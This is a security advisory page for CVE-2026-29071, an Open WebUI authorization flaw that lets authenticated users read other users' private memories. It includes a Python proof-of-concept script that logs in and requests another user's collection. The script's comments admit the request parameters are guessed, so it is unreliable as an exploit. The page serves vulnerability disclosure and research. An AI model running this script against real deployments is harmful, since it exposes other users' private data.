Security Vulnerability Report
CVE-2026-29071 CVSS 3.1 LOW

Published: 2026-03-27 00:16:23
Last Modified: 2026-04-01 16:09:53

Description

Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to version 0.8.6, any authenticated user can read other users' private memories via `/api/v1/retrieval/query/collection`. Version 0.8.6 patches the issue.

CVSS Details

CVSS Score: 3.1
Severity: LOW
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N (Secondary metric)
Primary metric: 4.3 MEDIUM, CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N (same impact, but attack complexity rated Low)
Weakness: CWE-639 (Authorization Bypass Through User-Controlled Key)

Configurations (Affected Products)

cpe:2.3:a:openwebui:open_webui:*:*:*:*:*:*:*:* - VULNERABLE
Open WebUI < 0.8.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target configuration
target_url = "http://localhost:3000"
username = "attacker"
password = "attacker_password"

# 1. Authenticate to obtain a session token
login_payload = {
    "username": username,
    "password": password
}
session = requests.Session()
login_resp = session.post(f"{target_url}/api/v1/auths/login", json=login_payload)

if login_resp.status_code == 200:
    print("[+] Login successful")
    # Assuming session handles cookies, or extract token if needed

    # 2. Exploit the IDOR vulnerability
    # The endpoint /api/v1/retrieval/query/collection allows querying memories.
    # By modifying the collection_id or user_id in the request,
    # an attacker can read other users' private memories.
    exploit_url = f"{target_url}/api/v1/retrieval/query/collection"

    # Attempting to access a target collection (IDOR)
    # The actual parameter name might vary (e.g., 'id', 'collection_id', 'user_id')
    exploit_payload = {
        "collection_id": "victim_user_collection_id"
    }
    exploit_resp = session.post(exploit_url, json=exploit_payload)

    if exploit_resp.status_code == 200:
        print("[+] Exploit successful! Leaked data:")
        print(exploit_resp.text)
    else:
        print(f"[-] Request failed with status code: {exploit_resp.status_code}")
else:
    print("[-] Login failed")

References

https://github.com/open-webui/open-webui/security/advisories/GHSA-w9f8-gxf9-rhvw (Vendor Advisory, Exploit)